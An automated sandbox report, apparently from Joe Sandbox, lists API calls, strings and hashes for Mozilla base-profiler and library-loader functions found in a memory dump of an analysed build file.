getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING), ref: 6C274801
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C274817
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C27482D
__Init_thread_footer.LIBCMT ref: 6C27484A

Part of subcall function 6C29AB3F: EnterCriticalSection.KERNEL32(6C2EE370,?,?,6C263527,6C2EF6CC,?,?,?,?,?,?,?,?,6C263284), ref: 6C29AB49
Part of subcall function 6C29AB3F: LeaveCriticalSection.KERNEL32(6C2EE370,?,6C263527,6C2EF6CC,?,?,?,?,?,?,?,?,6C263284,?,?,6C2856F6), ref: 6C29AB7C

GetCurrentThreadId.KERNEL32 ref: 6C27485F
GetCurrentThreadId.KERNEL32 ref: 6C27487E
AcquireSRWLockExclusive.KERNEL32(6C2EF4B8), ref: 6C27488B
free.MOZGLUE(?), ref: 6C27493A
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C274956
free.MOZGLUE(00000000), ref: 6C274960
ReleaseSRWLockExclusive.KERNEL32(6C2EF4B8), ref: 6C27499A

Part of subcall function 6C29AB89: EnterCriticalSection.KERNEL32(6C2EE370,?,?,?,6C2634DE,6C2EF6CC,?,?,?,?,?,?,?,6C263284), ref: 6C29AB94
Part of subcall function 6C29AB89: LeaveCriticalSection.KERNEL32(6C2EE370,?,6C2634DE,6C2EF6CC,?,?,?,?,?,?,?,6C263284,?,?,6C2856F6), ref: 6C29ABD1

free.MOZGLUE(?), ref: 6C2749C6
free.MOZGLUE(?), ref: 6C2749E9

Part of subcall function 6C285E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C285EDB
Part of subcall function 6C285E90: memset.VCRUNTIME140(ew,l,000000E5,?), ref: 6C285F27
Part of subcall function 6C285E90: LeaveCriticalSection.KERNEL32(?), ref: 6C285FB2

Strings

[I %d/%d] profiler_shutdown, xrefs: 6C274A06
MOZ_BASE_PROFILER_LOGGING, xrefs: 6C274828
MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6C274812
MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 6C2747FC
MOZ_PROFILER_SHUTDOWN, xrefs: 6C274A42

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: CriticalSection$free$EnterLeavegetenv$CurrentExclusiveLockThread$AcquireInit_thread_footerReleasememset
String ID: MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING$MOZ_PROFILER_SHUTDOWN$[I %d/%d] profiler_shutdown
API String ID: 1340022502-4194431170
Opcode ID: fc339b9550b6d5516c6989cbcffe1688de8bc3bf50d7eb05e240594799ea8c36
Instruction ID: 8406a0193f4bb0464ad8802ac63edbb27783e25318ddeb8f0da624acf6235edb
Opcode Fuzzy Hash: fc339b9550b6d5516c6989cbcffe1688de8bc3bf50d7eb05e240594799ea8c36
Instruction Fuzzy Hash: 34814671A0020DCBDB20DF68D8D8B5A3775AF4A319F540235ED16A7B81E731E944CFA6

Function 6C274470 Relevance: 45.7, APIs: 20, Strings: 6, Instructions: 178libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 6C274730: GetModuleHandleW.KERNEL32(00000000,?,?,?,?,6C2744B2,6C2EE21C,6C2EF7F8), ref: 6C27473E
Part of subcall function 6C274730: GetProcAddress.KERNEL32(00000000,GetNtLoaderAPI), ref: 6C27474A

GetModuleHandleW.KERNEL32(WRusr.dll), ref: 6C2744BA
LoadLibraryW.KERNEL32(kernel32.dll), ref: 6C2744D2
InitOnceExecuteOnce.KERNEL32(6C2EF80C,6C26F240,?,?), ref: 6C27451A
GetModuleHandleW.KERNEL32(user32.dll), ref: 6C27455C
LoadLibraryW.KERNEL32(?), ref: 6C274592
InitializeCriticalSection.KERNEL32(6C2EF770), ref: 6C2745A2
moz_xmalloc.MOZGLUE(00000008), ref: 6C2745AA
moz_xmalloc.MOZGLUE(00000018), ref: 6C2745BB
InitOnceExecuteOnce.KERNEL32(6C2EF818,6C26F240,?,?), ref: 6C274612
?IsWin32kLockedDown@mozilla@@YA_NXZ.MOZGLUE ref: 6C274636
LoadLibraryW.KERNEL32(user32.dll), ref: 6C274644
memset.VCRUNTIME140(?,00000000,00000114), ref: 6C27466D
VerSetConditionMask.NTDLL ref: 6C27469F
VerSetConditionMask.NTDLL ref: 6C2746AB
VerSetConditionMask.NTDLL ref: 6C2746B2
VerSetConditionMask.NTDLL ref: 6C2746B9
VerSetConditionMask.NTDLL ref: 6C2746C0
VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6C2746CD
GetModuleHandleW.KERNEL32(00000000), ref: 6C2746F1
GetProcAddress.KERNEL32(00000000,NativeNtBlockSet_Write), ref: 6C2746FD

Strings

l, xrefs: 6C274578
user32.dll, xrefs: 6C274557, 6C27463F
kernel32.dll, xrefs: 6C2744CD
G.l, xrefs: 6C2744FC
WRusr.dll, xrefs: 6C2744B5
NativeNtBlockSet_Write, xrefs: 6C2746F7

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: ConditionMask$HandleModuleOnce$LibraryLoad$AddressExecuteInitProcmoz_xmalloc$CriticalDown@mozilla@@InfoInitializeLockedSectionVerifyVersionWin32kmemset
String ID: G.l$NativeNtBlockSet_Write$WRusr.dll$kernel32.dll$l$user32.dll
API String ID: 1702738223-456935542
Opcode ID: 248834e17a2ac4d20ffb6efeea7153840c7380689b2dd75d10b713fde27466f5
Instruction ID: b21842fc939c64fda4bb67c14fd93ebc2dc071e90ef6e1f3b582349ec89725ce
Opcode Fuzzy Hash: 248834e17a2ac4d20ffb6efeea7153840c7380689b2dd75d10b713fde27466f5
Instruction Fuzzy Hash: D561E5B0A0034C9FEB209F65D88DB967BB8EB4A709F548558ED04AB681D7709A84CF71

Function 6C2719A0 Relevance: 44.2, APIs: 24, Strings: 1, Instructions: 407COMMON

Download Yara Rule

APIs

AcquireSRWLockExclusive.KERNEL32(6C2EF760), ref: 6C2719BD
GetCurrentProcess.KERNEL32 ref: 6C2719E5
GetLastError.KERNEL32 ref: 6C271A27
moz_xmalloc.MOZGLUE(?), ref: 6C271A41
memset.VCRUNTIME140(00000000,00000000,?), ref: 6C271A4F
GetLastError.KERNEL32 ref: 6C271A92
moz_xmalloc.MOZGLUE(?), ref: 6C271AAC
memset.VCRUNTIME140(00000000,00000000,?), ref: 6C271ABA
LocalFree.KERNEL32(?), ref: 6C271C69
free.MOZGLUE(?), ref: 6C271C8F
free.MOZGLUE(?), ref: 6C271C9D
CloseHandle.KERNEL32(?), ref: 6C271CAE
ReleaseSRWLockExclusive.KERNEL32(6C2EF760), ref: 6C271D52
GetLastError.KERNEL32 ref: 6C271DA5
GetLastError.KERNEL32 ref: 6C271DFB
GetLastError.KERNEL32 ref: 6C271E49
GetLastError.KERNEL32 ref: 6C271E68
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C271E9B

Part of subcall function 6C272070: LoadLibraryW.KERNEL32(combase.dll,6C271C5F), ref: 6C2720AE
Part of subcall function 6C272070: GetProcAddress.KERNEL32(00000000,CoInitializeSecurity), ref: 6C2720CD
Part of subcall function 6C272070: __Init_thread_footer.LIBCMT ref: 6C2720E1

memset.VCRUNTIME140(?,00000000,00000110), ref: 6C271F15
VerSetConditionMask.NTDLL ref: 6C271F46
VerSetConditionMask.NTDLL ref: 6C271F52
VerSetConditionMask.NTDLL ref: 6C271F59
VerSetConditionMask.NTDLL ref: 6C271F60
VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6C271F6D

Strings

D, xrefs: 6C271B57

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: ErrorLast$ConditionMask$freememset$ExclusiveLockmoz_xmalloc$AcquireAddressCloseCurrentFreeHandleInfoInit_thread_footerLibraryLoadLocalProcProcessReleaseVerifyVersion
String ID: D
API String ID: 290179723-2746444292
Opcode ID: ad80d59414f3f9c38d200994a6afdc15da5aa89ebf3ff2fbff51122e32a4107f
Instruction ID: 43bce7e34cce4c02ad4ed7bc824fa5db91e12fad8475ba3120fb4991a8124c99
Opcode Fuzzy Hash: ad80d59414f3f9c38d200994a6afdc15da5aa89ebf3ff2fbff51122e32a4107f
Instruction Fuzzy Hash: 8DF19271E013299BEB609F65CD88BAAB7B8FF49704F114159ED09A7680D770ED80CFA1

Function 6C2AE8B0 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 297threadsynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 6C2A7090: ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,00000000,?,6C2AB9F1,?), ref: 6C2A7107

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,6C2ADCF5), ref: 6C2AE92D
GetCurrentThreadId.KERNEL32 ref: 6C2AEA4F
AcquireSRWLockExclusive.KERNEL32(6C2EF4B8), ref: 6C2AEA5C
ReleaseSRWLockExclusive.KERNEL32(6C2EF4B8), ref: 6C2AEA80
GetCurrentThreadId.KERNEL32 ref: 6C2AEA8A
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,6C2ADCF5), ref: 6C2AEA92
GetCurrentThreadId.KERNEL32 ref: 6C2AEB11
AcquireSRWLockExclusive.KERNEL32(6C2EF4B8), ref: 6C2AEB1E
memset.VCRUNTIME140(?,00000000,000000E0), ref: 6C2AEB3C
ReleaseSRWLockExclusive.KERNEL32(6C2EF4B8), ref: 6C2AEB5B

Part of subcall function 6C2A5710: ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C2AEB71), ref: 6C2A57AB

Part of subcall function 6C29CBE8: GetCurrentProcess.KERNEL32(?,6C2631A7), ref: 6C29CBF1
Part of subcall function 6C29CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C2631A7), ref: 6C29CBFA

Part of subcall function 6C2A9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C274A68), ref: 6C2A945E
Part of subcall function 6C2A9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C2A9470
Part of subcall function 6C2A9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C2A9482
Part of subcall function 6C2A9420: __Init_thread_footer.LIBCMT ref: 6C2A949F

GetCurrentThreadId.KERNEL32 ref: 6C2AEBA4
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000), ref: 6C2AEBAC

Part of subcall function 6C2A94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C2A94EE
Part of subcall function 6C2A94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C2A9508

GetCurrentThreadId.KERNEL32 ref: 6C2AEBC1
AcquireSRWLockExclusive.KERNEL32(6C2EF4B8,?,?,00000000), ref: 6C2AEBCE
?profiler_init@baseprofiler@mozilla@@YAXPAX@Z.MOZGLUE(00000000,?,?,00000000), ref: 6C2AEBE5
ReleaseSRWLockExclusive.KERNEL32(6C2EF4B8,00000000), ref: 6C2AEC37
WaitForSingleObject.KERNEL32(?,000000FF), ref: 6C2AEC46
CloseHandle.KERNEL32(?), ref: 6C2AEC55
free.MOZGLUE(00000000), ref: 6C2AEC5C

Strings

[I %d/%d] profiler_start, xrefs: 6C2AEBB4
[I %d/%d] baseprofiler_save_profile_to_file(%s), xrefs: 6C2AEA9B

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: ExclusiveLock$Current$ReleaseThread$Acquiregetenv$Process_getpid$?profiler_init@baseprofiler@mozilla@@CloseHandleInit_thread_footerObjectSingleTerminateWait__acrt_iob_func__stdio_common_vfprintffreemallocmemset
String ID: [I %d/%d] baseprofiler_save_profile_to_file(%s)$[I %d/%d] profiler_start
API String ID: 1341148965-1186885292
Opcode ID: e775e9261a21ee7eb503576ad4d2cbe90964288c74ac7d585a8535ec0332b19a
Instruction ID: 8f5f264af2f3f1ce4458456585921eea30e28f5d139d9fd8d7916d0d3183370f
Opcode Fuzzy Hash: e775e9261a21ee7eb503576ad4d2cbe90964288c74ac7d585a8535ec0332b19a
Instruction Fuzzy Hash: 25A146317003098FDB009F99D848BA677B5FF8E308F144429EE19A7B91DB719816CBA5

Function 6C2AF6E0 Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 235threadstringCOMMON

Download Yara Rule

APIs

Part of subcall function 6C2A9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C274A68), ref: 6C2A945E
Part of subcall function 6C2A9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C2A9470
Part of subcall function 6C2A9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C2A9482
Part of subcall function 6C2A9420: __Init_thread_footer.LIBCMT ref: 6C2A949F

GetCurrentThreadId.KERNEL32 ref: 6C2AF70E
??$AddMarker@UTextMarker@markers@baseprofiler@mozilla@@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@baseprofiler@mozilla@@YA?AVProfileBufferBlockIndex@1@ABV?$ProfilerStringView@D@1@ABVMarkerCategory@1@$$QAVMarkerOptions@1@UTextMarker@markers@01@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.MOZGLUE ref: 6C2AF8F9

Part of subcall function 6C276390: GetCurrentThreadId.KERNEL32 ref: 6C2763D0
Part of subcall function 6C276390: AcquireSRWLockExclusive.KERNEL32 ref: 6C2763DF
Part of subcall function 6C276390: ReleaseSRWLockExclusive.KERNEL32 ref: 6C27640E

ReleaseSRWLockExclusive.KERNEL32(6C2EF4B8), ref: 6C2AF93A
GetCurrentThreadId.KERNEL32 ref: 6C2AF98A
GetCurrentThreadId.KERNEL32 ref: 6C2AF990
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C2AF994
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C2AF716

Part of subcall function 6C2A94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C2A94EE
Part of subcall function 6C2A94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C2A9508

Part of subcall function 6C26B5A0: memcpy.VCRUNTIME140(?,?,?,?,00000000), ref: 6C26B5E0

GetCurrentThreadId.KERNEL32 ref: 6C2AF739
AcquireSRWLockExclusive.KERNEL32(6C2EF4B8), ref: 6C2AF746
GetCurrentThreadId.KERNEL32 ref: 6C2AF793
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,6C2E385B,00000002,?,?,?,?,?), ref: 6C2AF829
free.MOZGLUE(?,?,00000000,?), ref: 6C2AF84C
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?," attempted to re-register as ",0000001F,?,00000000,?), ref: 6C2AF866
free.MOZGLUE(?), ref: 6C2AFA0C

Part of subcall function 6C275E60: moz_xmalloc.MOZGLUE(00000040,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C2755E1), ref: 6C275E8C
Part of subcall function 6C275E60: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C275E9D
Part of subcall function 6C275E60: GetCurrentThreadId.KERNEL32 ref: 6C275EAB
Part of subcall function 6C275E60: GetCurrentThreadId.KERNEL32 ref: 6C275EB8
Part of subcall function 6C275E60: strlen.API-MS-WIN-CRT-STRING-L1-1-0(GeckoMain,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C275ECF
Part of subcall function 6C275E60: moz_xmalloc.MOZGLUE(00000024), ref: 6C275F27
Part of subcall function 6C275E60: moz_xmalloc.MOZGLUE(00000004), ref: 6C275F47
Part of subcall function 6C275E60: GetCurrentProcess.KERNEL32 ref: 6C275F53
Part of subcall function 6C275E60: GetCurrentThread.KERNEL32 ref: 6C275F5C
Part of subcall function 6C275E60: GetCurrentProcess.KERNEL32 ref: 6C275F66
Part of subcall function 6C275E60: DuplicateHandle.KERNEL32(00000000,?,?,?,0000004A,00000000,00000000), ref: 6C275F7E

free.MOZGLUE(?), ref: 6C2AF9C5
free.MOZGLUE(?), ref: 6C2AF9DA

Strings

[I %d/%d] profiler_register_thread(%s) - thread %llu already registered as %s, xrefs: 6C2AF9A6
Thread , xrefs: 6C2AF789
" attempted to re-register as ", xrefs: 6C2AF858
[D %d/%d] profiler_register_thread(%s), xrefs: 6C2AF71F

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: Current$Thread$ExclusiveLockfree$getenvmoz_xmallocstrlen$AcquireD@std@@MarkerProcessReleaseTextU?$char_traits@V?$allocator@V?$basic_string@_getpid$BlockBufferCategory@1@$$D@1@D@2@@std@@@D@2@@std@@@baseprofiler@mozilla@@DuplicateHandleIndex@1@Init_thread_footerMarker@Marker@markers@01@Marker@markers@baseprofiler@mozilla@@Now@Options@1@ProfileProfilerStamp@mozilla@@StringTimeV12@_View@__acrt_iob_func__stdio_common_vfprintfmemcpy
String ID: " attempted to re-register as "$Thread $[D %d/%d] profiler_register_thread(%s)$[I %d/%d] profiler_register_thread(%s) - thread %llu already registered as %s
API String ID: 882766088-1834255612
Opcode ID: 2fca2f6142f427d0dc766863c0fc4f16f9cdf07440140e45a3c5dca23e597f62
Instruction ID: ed8640f7aa6ed6f0963c9c78c98017c106861699776c4b5d41669b86c41ede47
Opcode Fuzzy Hash: 2fca2f6142f427d0dc766863c0fc4f16f9cdf07440140e45a3c5dca23e597f62
Instruction Fuzzy Hash: 35811571A043099FD710DF65C844AABB7B5FFC9308F44452DEC45ABB91EB34984ACBA2

Function 6C274180 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 180libraryloaderCOMMON

Download Yara Rule

APIs

?IsWin32kLockedDown@mozilla@@YA_NXZ.MOZGLUE ref: 6C274196
memset.VCRUNTIME140(?,00000000,00000110,?,?,00000010,00000003,?,00000020,00000003,?,00000004,00000003,?,00000001,00000003), ref: 6C2741F1
VerSetConditionMask.NTDLL ref: 6C274223
VerSetConditionMask.NTDLL ref: 6C27422A
VerSetConditionMask.NTDLL ref: 6C274231
VerSetConditionMask.NTDLL ref: 6C274238
VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6C274245
LoadLibraryW.KERNEL32(Shcore.dll,?,?,00000010,00000003,?,00000020,00000003,?,00000004,00000003,?,00000001,00000003), ref: 6C274263
GetProcAddress.KERNEL32(00000000,SetProcessDpiAwareness), ref: 6C27427A
FreeLibrary.KERNEL32(?), ref: 6C274299
memset.VCRUNTIME140(?,00000000,00000114), ref: 6C2742C4
VerSetConditionMask.NTDLL ref: 6C2742F6
VerSetConditionMask.NTDLL ref: 6C274302
VerSetConditionMask.NTDLL ref: 6C274309
VerSetConditionMask.NTDLL ref: 6C274310
VerSetConditionMask.NTDLL ref: 6C274317
VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6C274324

Strings

Shcore.dll, xrefs: 6C27425E
SetProcessDpiAwareness, xrefs: 6C274274

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: ConditionMask$InfoLibraryVerifyVersionmemset$AddressDown@mozilla@@FreeLoadLockedProcWin32k
String ID: SetProcessDpiAwareness$Shcore.dll
API String ID: 3038791930-999387375
Opcode ID: 6922795b58b0fdeeb630fb57079dc4efe4705626da37b39d489faf58cac77551
Instruction ID: 242234455e70b4eeaefef398f74835354d165494142439d39f6e8645d577c2e4
Opcode Fuzzy Hash: 6922795b58b0fdeeb630fb57079dc4efe4705626da37b39d489faf58cac77551
Instruction Fuzzy Hash: 5351E271A402196BEB216B748C8DFAA777CDF8AB14F154518FD05AB6C0CB749D50CAA0

Function 6C2AEE40 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 166threadsynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 6C2A9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C274A68), ref: 6C2A945E
Part of subcall function 6C2A9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C2A9470
Part of subcall function 6C2A9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C2A9482
Part of subcall function 6C2A9420: __Init_thread_footer.LIBCMT ref: 6C2A949F

GetCurrentThreadId.KERNEL32 ref: 6C2AEE60
AcquireSRWLockExclusive.KERNEL32(6C2EF4B8), ref: 6C2AEE6D
ReleaseSRWLockExclusive.KERNEL32(6C2EF4B8), ref: 6C2AEE92
WaitForSingleObject.KERNEL32(?,000000FF), ref: 6C2AEEA5
CloseHandle.KERNEL32(?), ref: 6C2AEEB4
free.MOZGLUE(00000000), ref: 6C2AEEBB
GetCurrentThreadId.KERNEL32 ref: 6C2AEEC7
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C2AEECF

Part of subcall function 6C2ADE60: GetCurrentThreadId.KERNEL32 ref: 6C2ADE73
Part of subcall function 6C2ADE60: _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,6C274A68), ref: 6C2ADE7B
Part of subcall function 6C2ADE60: ?RegisterProfilerLabelEnterExit@mozilla@@YAXP6APAXPBD0PAX@ZP6AX1@Z@Z.MOZGLUE(00000000,00000000,?,?,?,6C274A68), ref: 6C2ADEB8
Part of subcall function 6C2ADE60: free.MOZGLUE(00000000,?,6C274A68), ref: 6C2ADEFE
Part of subcall function 6C2ADE60: ?ReleaseBufferForMainThreadAddMarker@base_profiler_markers_detail@mozilla@@YAXXZ.MOZGLUE ref: 6C2ADF38

Part of subcall function 6C29CBE8: GetCurrentProcess.KERNEL32(?,6C2631A7), ref: 6C29CBF1
Part of subcall function 6C29CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C2631A7), ref: 6C29CBFA

GetCurrentThreadId.KERNEL32 ref: 6C2AEF1E
AcquireSRWLockExclusive.KERNEL32(6C2EF4B8), ref: 6C2AEF2B
ReleaseSRWLockExclusive.KERNEL32(6C2EF4B8), ref: 6C2AEF59
GetCurrentThreadId.KERNEL32 ref: 6C2AEFB0
AcquireSRWLockExclusive.KERNEL32(6C2EF4B8), ref: 6C2AEFBD
ReleaseSRWLockExclusive.KERNEL32(6C2EF4B8), ref: 6C2AEFE1
GetCurrentThreadId.KERNEL32 ref: 6C2AEFF8
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C2AF000

Part of subcall function 6C2A94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C2A94EE
Part of subcall function 6C2A94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C2A9508

?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6C2AF02F

Part of subcall function 6C2AF070: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C2AF09B
Part of subcall function 6C2AF070: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000), ref: 6C2AF0AC
Part of subcall function 6C2AF070: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000,00000000), ref: 6C2AF0BE

Strings

[I %d/%d] profiler_pause, xrefs: 6C2AF008
[I %d/%d] profiler_stop, xrefs: 6C2AEED7

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: CurrentThread$ExclusiveLock$Release$AcquireTime_getpidgetenv$ProcessStampV01@@Value@mozilla@@free$?profiler_time@baseprofiler@mozilla@@BufferCloseEnterExit@mozilla@@HandleInit_thread_footerLabelMainMarker@base_profiler_markers_detail@mozilla@@Now@ObjectProfilerRegisterSingleStamp@mozilla@@TerminateV12@_Wait__acrt_iob_func__stdio_common_vfprintf
String ID: [I %d/%d] profiler_pause$[I %d/%d] profiler_stop
API String ID: 16519850-1833026159
Opcode ID: 9b7734423292973d2a40ba2d29acb222d1a1931b86d247cea911f78c1ebf15aa
Instruction ID: 028a370176648a7a135186601893b879c25efed82764144f95c671b55fe20fef
Opcode Fuzzy Hash: 9b7734423292973d2a40ba2d29acb222d1a1931b86d247cea911f78c1ebf15aa
